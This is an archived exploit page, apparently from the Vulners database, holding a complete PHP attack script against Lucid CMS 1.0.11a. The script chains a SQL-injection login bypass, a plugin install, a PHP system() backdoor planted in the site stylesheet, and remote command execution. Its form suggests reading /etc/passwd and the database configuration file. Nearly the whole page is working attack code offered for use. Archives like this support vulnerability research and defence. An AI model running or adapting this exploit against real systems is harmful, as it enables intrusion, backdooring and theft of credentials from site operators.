Vulners
Lucene search
lucid_cms_1011_expl.txt
`<?php
# 7.36 30/09/2005 #
# #
# ---lucid_cms_1011expl.php #
# #
# Lucid CMS 1.0.11a SQL Injection / login bypass / remote code execution #
# all-in-one #
# #
# This exploits the vulnerability described here: #
# http://rgod.altervista.org/lucid1011.html #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: customize for your own pleasure, launch this script from Apache, #
# fill requested fields, then go! #
# #
# Sun-Tzu: "O divine art of subtlety and secrecy! Through you we learn to be #
# invisible, through you inaudible" #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<head><title> Lucid CMS 1.0.11a remote commands execution </title><meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type=
"text/css"> <!-- body,td,th {color: #00FF00;} body {background-color: #000000;}
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold;
font-style: italic; } --> </style></head> <body> <p class="Stile6"> Lucid CMS
V 1.0.11a (possibly prior versions) remote commands execution</p><p class="Stil
e6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&command=value&proxy=value"><p><input type="text" name="host">
<span class="Stile5">hostname (ex: www.sitename.com) </span> </p> <p> <input
type="text" name="path"><span class="Stile5"> path ( ex: /lucidcms/ or just /)
</span></p><p><input type="text" name="port" > <span class="Stile5"> specify
a port other than 80 (default value) </span></p><p> <input type="text"
name="command"> <span class="Stile5"> a Unix command , example: ls -la to list
directories, cat /etc/passwd to show passwd file, cat dbConfig.php to show data
base username & password </span></p><p><input type="text" name="proxy"> <span
class="Stile5"> send exploit through an HTTP proxy (ip:port)</span></p><p><input
type="submit"name="Submit" value="go!"></p></form></td></tr> </table> </body>
</html>';
function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket() //if you heve sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{
if (!eregi($proxy_regex,$proxy))
{echo htmlentities($proxy).' -> not a valid proxy...';
die;
}
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
if (!eregi($proxy_regex,$proxy))
{echo htmlentities($proxy).' -> not a valid proxy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
if (($path<>'') and ($host<>'') and ($command<>''))
{
if ($port=='') {$port=80;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
# so... you know, I'm verbous...
#STEP 1 -> SQL Injection /Login as admin
$sql="%27UNION%28SELECT%271%27%2C%27admin%27%2C%27admin%27%2C%[email protected]%27%2C%27d41d8cd98f00b204e9800998ecf8427e%27%2C%271%27%29%2F*";
$sql.=urlencode("Have you ever read that number of X-factor when Jamie Madroz dies 'cause the mutants HIV?");
$data="login_username=".$sql."&login_password=&pageName=&PromptTime=".time();
$packet="POST ".$p."index.php?command=panel HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.':'.$port.$path."index.php?command=panel\r\n";
$packet.="Accept-Language: fr\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050922 Firefox/1.0.7 (Debian package 1.0.7-1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: PHPSESSID=836324332f0e37553bfa7036f3985f20\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$cookie=$temp2[0]."path=/";
echo'<br>cookie: -> '.htmlentities($cookie).'<br><br>';
#STEP 2 -> Install RenderPHP plugin...
$packet="GET ".$p."index.php?command=pluginInstall&filename=renderPHP.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.':'.$port.$path."index.php?command=managePlugins\r\n";
$packet.="Accept-Language: pl\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SaveWealth)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
show($packet);
sendpacket($packet);
#STEP 3 -> Plugin activate...
$packet="GET ".$p."index.php?command=pluginActivate&filename=renderPHP.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.':'.$port.$path."index.php?command=pluginInstall&filename=renderPHP.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
show($packet);
sendpacket($packet);
#STEP 4 -> Get Stylesheet for main page, we don't want to ruin that, just to put a backdoor
$packet="GET ".$p."index.php?command=layout&mode=edit&type=style&id=1 HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.':'.$path."index.php?command=manageStyles\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Opera/8.5 (X11; Linux i686; U; en)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
show($packet);
sendpacket($packet);
$temp='';$i=0; while (!eregi('textarea',$temp)) { $temp.=$html[$i]; $i++; }
$temp=''; while (!eregi('>',$temp)) { $temp.=$html[$i]; $i++;};
$temp=''; while (!eregi('</textarea>',$temp)) { $temp.=$html[$i]; $i++; }
$temp=str_replace("</textarea>","",$temp);
$temp2=explode("***end***",$temp);
echo '<br>'.nl2br(htmlentities($temp2[0])).'<br><br>';
$sheet=$temp2[0];
#STEP 5 -> Shell Inject
$data="content=".urlencode($sheet);
#******shell********************
//ehi, this is your command line, add some # to clean stylesheet...
$data.="***end***";
$data.="%0D%0A%3C%3Fphp+error_reporting%280%29%3B+system%28%27".urlencode($command);
$data.="+%3E+README";//through this you redirect, a # to if you want to give a rm to output file...
$data.="%27%29%3B+%3F%3E";
#*******************************
$data.="&id=1&save=Save+Style&comment=";
$packet="POST ".$p."index.php?command=saveStyle HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.':'.$port.$path."index.php?command=layout&mode=edit&type=style&id=1\r\n";
$packet.="Accept-Language: es\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: WebCopier v4.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
show($packet);
sendpacket($packet);
#STEP 6 -> Execute command
$packet="GET ".$p."index.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mediapartners-Google/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Keep-Alive\r\n\r\n";
show($packet);
sendpacket($packet);
#STEP 7 -> Looking for redirected output...
$packet="GET ".$p."README HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: GameBoy, powered by Nintendo\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Keep-Alive\r\n\r\n";
show($packet);
sendpacket($packet);
}
else
{echo '<br>fill requested fields, optionalyy specify a proxy...<br><br>';}
?>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Oct 2005 00:00Current
7.4High risk
Vulners AI Score7.4